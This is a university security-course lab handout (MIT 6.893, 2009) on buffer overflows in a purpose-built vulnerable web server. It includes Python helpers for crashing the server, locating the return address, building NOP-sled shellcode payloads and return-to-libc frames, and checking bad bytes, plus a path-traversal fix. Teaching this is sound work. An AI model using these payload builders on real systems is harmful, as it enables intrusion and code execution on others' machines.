6.893 Fall 2009 Lab 1: Buffer overflows

Handed out:	Monday, September 14, 2009
Part 1 due:	Friday, September 18, 2009 (11:59pm)
All parts due:	Friday, September 25, 2009 (11:59pm)

Introduction

This lab will introduce you to buffer overflow vulnerabilities, in the context of a simple web server written for this lab assignment. You will find buffer overflows in the web server code, write exploits for the buffer overflows to inject code into the server, figure out how to bypass non-executable stack protection, and finally look for other potential problems in the web server implementation.

Exploiting buffer overflows requires precise control over the execution environment. A small change in the compiler, environment variables, or the way the program is executed can result in slightly different memory layout and code structure, thus requiring a different exploit. For this reason, this lab uses a VMware virtual machine to run the vulnerable web server code.

To start working on this lab assignment, you should download the VMware Player, which can run virtual machines on Linux and Windows systems. For Mac users, MIT has a site license for VMware Fusion. You can download VMware Fusion from this web site.

Once you have VMware installed on your machine, you should download the course VM image, and unpack it on your computer. This virtual machine contains an installation of Ubuntu 9.04 Linux, along with the source code for lab 1. The following accounts have been created inside the VM:

Username	Password
root	6893
user	6893
httpd	6893

If you find that something is missing, you can use the root account to install new software packages into the virtual machine using apt-get install pkgname. The user account can be used if you want to log in as a non-root user; it is purely for your convenience. Finally, the httpd account is used to execute the web server, and its home directory contains the source code you will need for this lab assignment, in /home/httpd/lab1. You can either log into the virtual machine using its console, or you can use ssh to log into the virtual machine over the (virtual) network. To determine the virtual machine's IP address, log in as root on the console and run /sbin/ifconfig eth0.

To help you keep track of any changes you make to the initial source code, we have initialized a git repository in /home/httpd/lab1, which you can use to manage your source code modifications. Here's an overview of Git and the Git user's manual, which you may find useful. Alternatively, you can download a clean copy of the lab source code.

Before you proceed with this lab assignment, make sure you can compile the web server by running make in /home/httpd/lab1.

There are two versions of the web server you will be using: httpd-exstack and httpd-nxstack. The first one has an executable stack, which makes it easier to inject executable code given a stack buffer overflow vulnerability. The second one has a non-executable stack, and you will write an exploit that bypasses non-executable stacks later in this lab assignment.

To run the web server in a predictable fashion, so that its stack and memory layout are the same every time, you will use the clean-env.sh script. This is the same way in which we will run the web server during grading, so make sure all of your exploits work in this configuration! Now, make sure you can run the web server using clean-env.sh and access it from a browser running on your machine.

Running /sbin/ifconfig eth0 inside the VM will give you the virtual machine's IP address. For example, if that address is 172.16.148.129, you would open your browser and go to the URL http://172.16.148.129:8080/. If something doesn't seem to be working, try to figure out what went wrong, or contact the course staff, before proceeding further.

Part 1: Finding buffer overflows

In the first part of this lab assignment, you will find buffer overflows in the provided web server (/home/httpd/lab1/httpd.c). Read Aleph One's article, Smashing the Stack for Fun and Profit, as well as the paper from lecture, to figure out how buffer overflows work.

Exercise 1. Study the web server's code, in httpd.c, and find as many instances of code vulnerable to memory corruption through a buffer overflow as you can. Write down a description of each vulnerability in the file /home/httpd/lab1/answers.txt. For each vulnerability, describe the buffer which may overflow, and how you would structure the input to the web server (i.e., the HTTP request) to overflow the buffer.

Now, you will start developing exploits to take advantage of the buffer overflows you have found above. We have provided template Python code for an exploit in /home/httpd/lab1/exploit-template.py, which issues an HTTP request. The exploit template takes two arguments, the server name and the port number; for example, to issue a request to httpd running on localhost, you would pass localhost and 8080 as its arguments.
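The template's contents are not reproduced in this handout. As a rough illustration of what a script that issues an HTTP request does, the Python sketch below opens a TCP connection, writes raw request bytes, and collects the reply. The name send_request and its parameters are hypothetical and are not taken from exploit-template.py. Treating a connection reset as the end of the reply is a deliberate choice: when an exploit crashes the server, that is often how the connection ends.

```python
import socket


def send_request(host: str, port: int, request: bytes, timeout: float = 5.0) -> bytes:
    """Send raw `request` bytes to host:port and return everything sent back."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while True:
            try:
                data = sock.recv(4096)
            except (socket.timeout, ConnectionResetError):
                # A timeout or a reset (e.g. the server crashed) ends the reply.
                break
            if not data:  # orderly close by the server
                break
            chunks.append(data)
    return b"".join(chunks)
```

For example, send_request("localhost", 8080, b"GET / HTTP/1.0\r\n\r\n") returns the raw response bytes, headers included.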

You are free to use this template, or write your own exploit code from scratch. Note, however, that if you choose to write your own exploit, the exploit must run correctly inside the provided virtual machine.

If you want to use gdb to help you in building your exploits, you will need to ensure that gdb runs the web server in precisely the same way as clean-env.sh does. To do this, you need to run the command unset env in gdb. You can place this command in a .gdbinit file, which gets executed every time gdb starts. We have provided such a file in /home/httpd/lab1/.gdbinit, which will take effect if you start gdb in that directory.

Exercise 2. Write an exploit that triggers each of the buffer overflows you have identified in the previous exercise. At this point, you do not need to inject code or do anything other than corrupt memory past the end of the buffer. Verify that your exploit actually corrupts memory, either by using gdb or by observing that the web server crashes.

Provide the code for each of these exploits in a separate file, and indicate in answers.txt which exploit file triggers which buffer overflow. If you believe some of the vulnerabilities you have identified in exercise 1 cannot be exploited, explain why not.
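Which buffers overflow, and through which part of the request, is what Exercise 1 asks you to work out, so the following is only a sketch under an assumption: that one overflow is reachable through an overly long request path. The hypothetical helper long_path_request builds such a request, padding the path with a recognizable byte so that overwritten memory is easy to spot in gdb.

```python
def long_path_request(length: int, filler: bytes = b"A") -> bytes:
    """Build a GET request whose path is '/' followed by `length` filler bytes.

    A run of a recognizable byte such as 'A' (0x41) makes corruption easy to
    see in gdb: a saved register reading 0x41414141 came from this input.
    """
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    path = b"/" + filler * length
    return b"GET " + path + b" HTTP/1.0\r\n\r\n"
```

You could send the result with the exploit template, increasing length until the server crashes or gdb shows the corruption you expect.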

Submit your answers to this part of the lab assignment by running make handin, and upload the resulting lab1-handin.tar.gz file at http://pdos.csail.mit.edu/cgi-bin/893handin.

Part 2: Code injection

In this part, you will use your buffer overflow exploits to inject code into the web server. Use the httpd-exstack binary, since it has an executable stack that makes it easier to inject code. The goal of the injected code will be to unlink (remove) a sensitive file on the server, namely /home/httpd/grades.txt.

We have provided Aleph One's shell code for you to use in /home/httpd/lab1/shellcode.S, along with Makefile rules that produce /home/httpd/lab1/shellcode.bin, a compiled version of the shell code, when you run make. Aleph One's exploit is intended to exploit setuid-root binaries, and thus it runs a shell. You will need to modify this shell code to instead unlink /home/httpd/grades.txt.
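Aleph One's article notes that injected code is usually copied by a string function, which stops at the first NUL byte, so the shell code must not contain 0x00. Depending on how httpd.c parses a request, other bytes (such as spaces, carriage returns, or newlines in the request line) may also cut your payload short; the forbidden set is therefore a parameter you should adjust to the overflow you are targeting. This hypothetical Python helper, find_bad_bytes, reports the offending offsets in a compiled blob such as shellcode.bin.

```python
from __future__ import annotations


def find_bad_bytes(code: bytes, forbidden: bytes = b"\x00") -> list[tuple[int, int]]:
    """Return (offset, byte value) for every byte of `code` found in `forbidden`."""
    bad = set(forbidden)  # iterating over bytes yields ints
    return [(i, b) for i, b in enumerate(code) if b in bad]
```

For example, find_bad_bytes(open("shellcode.bin", "rb").read(), b"\x00 \r\n") returns an empty list if none of those four bytes appear in the compiled shell code.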

Exercise 3. Modify your exploits for each buffer overflow in exercise 2 to hijack the control flow of the web server and unlink /home/httpd/grades.txt.

If you believe that some of the buffer overflow vulnerabilities cannot be exploited in this manner, explain why not in answers.txt.

Verify that your exploits work; you will need to re-create /home/httpd/grades.txt after each successful exploit run.

Suggestion: first focus on obtaining control of the program counter. Sketch out the stack layout that you expect the program to have at the point when you overflow the buffer, and use gdb to verify that your overflow data ends up where you expect it to. Step through the execution of the function to the return instruction to make sure you can control what address the program returns to. The next, stepi, info reg, and disassemble commands in gdb should prove helpful.
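One common way to find how far into your input the saved return address sits is to send a pattern in which every 4-byte window is distinct, let the server crash, and look up the value of %eip (shown by info reg in gdb) in that pattern. The Python sketch below uses the widely used Aa0Aa1... alphabet; cyclic_pattern and pattern_offset are illustrative names, and the little-endian packing assumes the VM runs 32-bit x86 code.

```python
import itertools
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Return `length` bytes of the pattern Aa0Aa1...Aa9Ab0...Zz9.

    Every 4-byte window in it is distinct (up to 26 * 26 * 10 * 3 = 20280
    bytes), so the 4 bytes that land in a saved return address identify
    exactly where in the pattern they came from.
    """
    out = bytearray()
    for upper, lower, digit in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    ):
        if len(out) >= length:
            break
        out += (upper + lower + digit).encode()
    if len(out) < length:
        raise ValueError("requested length exceeds the pattern's unique range")
    return bytes(out[:length])


def pattern_offset(eip: int, length: int = 20280) -> int:
    """Return the offset of a crashed %eip value in the pattern, or -1.

    x86 is little-endian, so the bytes in memory are the value packed '<I'.
    """
    return cyclic_pattern(length).find(struct.pack("<I", eip))
```

The offset is relative to the start of the pattern, so if the pattern follows other request bytes in the buffer, account for those when computing the padding.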

Once you can reliably hijack the control flow of the program, find a suitable address that will contain the code you want to execute, and focus on placing the correct code at that address, e.g., a derivative of Aleph One's shell code.
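Once you know the offset of the saved return address and the buffer's address (both from gdb, running under the same environment as clean-env.sh), one classic layout described in Aleph One's article places a run of NOP instructions before the shell code and points the return address into that run, so a slightly wrong address still slides into the code. This sketch assumes 32-bit x86 and an overflow that copies the whole payload into the buffer; build_injection_payload and its parameters are hypothetical. It refuses a return address containing a NUL byte, for the same reason the shell code must avoid one.

```python
import struct

NOP = b"\x90"  # x86 one-byte no-op instruction


def build_injection_payload(shellcode: bytes, offset: int, buf_addr: int,
                            sled_len: int = 64, filler: bytes = b"A") -> bytes:
    """Return [NOP sled][shellcode][filler][return address] (32-bit x86 assumed).

    offset   -- bytes from the start of the buffer to the saved return address
    buf_addr -- address where the buffer starts, as observed in gdb
    """
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    body = NOP * sled_len + shellcode
    if len(body) > offset:
        raise ValueError("sled and shellcode do not fit before the return address")
    # Filler after the code helps keep it out of the bytes just below the
    # return-address slot, which the code's own pushes overwrite after RET.
    body += filler * (offset - len(body))
    # Aim at the middle of the sled so a slightly wrong buf_addr still works.
    packed = struct.pack("<I", buf_addr + sled_len // 2)
    if b"\x00" in packed:
        raise ValueError("return address contains a NUL byte")
    return body + packed
```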

Part 3: Return-to-libc attacks

Many modern operating systems mark the stack non-executable in an attempt to make it more difficult to exploit buffer overflows. In this part, you will explore how this protection mechanism can be circumvented. Run the httpd-nxstack server binary, which has a non-executable stack, for this part of the lab.

The key observation to exploiting buffer overflows with a non-executable stack is that you still control the program counter, after a RET instruction jumps to an address that you placed on the stack. Even though you cannot jump to the address of the overflowed buffer (it will not be executable), there's usually enough code in the vulnerable server's address space to perform the operation you want.

Thus, to bypass a non-executable stack, you need to first find the code you want to execute. This is often a function in the standard library, called libc, such as execl, system, or unlink. Then, you need to arrange for the stack to look like a call to that function with the desired arguments, such as system("/bin/sh"). Finally, you need to arrange for the RET instruction to jump to the function you found in the first step. This attack is often called a return-to-libc attack. This article contains a more detailed description of this style of attack.
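On 32-bit x86, a function entered via RET instead of CALL still expects the stack to look as if it had just been called: its own return address at (%esp) and its first argument at 4(%esp). The Python sketch below lays out that frame for a one-argument function such as unlink, with the argument string placed right after it on the stack. All addresses are values you would look up yourself, for example func_addr with print unlink in gdb, and ret_slot_addr as the address of the saved return address you overwrite; build_ret2libc_payload is a hypothetical helper. It rejects addresses containing a NUL byte, which would truncate a string-copy overflow, and the trailing NUL that terminates the argument assumes the overflow tolerates one final zero byte.

```python
import struct


def p32(value: int) -> bytes:
    """Pack a 32-bit value little-endian, the way x86 stores it in memory."""
    return struct.pack("<I", value)


def build_ret2libc_payload(offset: int, ret_slot_addr: int, func_addr: int,
                           func_ret_addr: int, arg: bytes,
                           filler: bytes = b"A") -> bytes:
    """Return [filler * offset][func_addr][func_ret_addr][&arg][arg NUL].

    When the vulnerable function executes RET, %eip <- func_addr and %esp
    points at func_ret_addr, so the callee finds its return address at (%esp)
    and its single argument (a pointer to arg) at 4(%esp), as in a normal call.
    """
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    arg_addr = ret_slot_addr + 12  # the string starts after three 4-byte words
    words = [func_addr, func_ret_addr, arg_addr]
    for w in words:
        if b"\x00" in p32(w):
            raise ValueError(f"address {w:#010x} contains a NUL byte")
    return filler * offset + b"".join(p32(w) for w in words) + arg + b"\x00"
```

func_ret_addr is where the called function goes when it finishes; pointing it at a function such as exit (an assumption, not a requirement) lets the process terminate rather than crash.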

Exercise 4. Make a copy of your exploit code for each of the vulnerabilities you found in exercise 3, and modify it to achieve the same goal (i.e., unlink /home/httpd/grades.txt) when run on the httpd-nxstack binary. In answers.txt, point out which exploit file corresponds to which vulnerability, or if you believe a vulnerability cannot be exploited with a non-executable stack, explain why not.

Part 4: Fixing buffer overflows and other bugs

Now that you have figured out how to exploit buffer overflows, you will try to find other kinds of vulnerabilities in the same code. As with many real-world applications, the "security" of our web server is not well-defined. Thus, you will need to use your imagination to think of a plausible threat model and policy for the web server.

Exercise 5. Look through the httpd.c code and try to find more vulnerabilities that can allow an attacker to compromise the security of the web server. Describe the attacks you have found in answers.txt, along with an explanation of the limitations of the attack, what an attacker can accomplish, why it works, and how you might go about fixing or preventing it.

One approach for finding vulnerabilities is to trace the flow of inputs controlled by the attacker through the server code. At each point that the attacker's input is used, consider all the possible values the attacker might have provided at that point, and what the attacker can achieve in that manner.
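One class of non-overflow bug worth checking for in any server that maps request paths to files is path traversal, where a request such as GET /../../etc/passwd escapes the directory the server means to serve. Whether httpd.c is affected is for you to determine. As an illustration of tracing one attacker-controlled input to a check, here is a Python sketch of a fix; resolve_under_root is a hypothetical helper, not a function from httpd.c, and it assumes the path has already been URL-decoded (otherwise an encoded form like %2e%2e would slip past it).

```python
import os
from typing import Optional


def resolve_under_root(docroot: str, request_path: str) -> Optional[str]:
    """Map a URL path to a file under docroot, or return None if it escapes."""
    root = os.path.realpath(docroot)
    # Strip leading slashes so os.path.join does not treat the path as absolute.
    candidate = os.path.realpath(os.path.join(root, request_path.lstrip("/")))
    # realpath collapses '..' and resolves symlinks, so a symlink inside the
    # root that points outside it is rejected here as well.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate
```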

Finally, we will quickly look at fixing all of the vulnerabilities you have found in this lab assignment.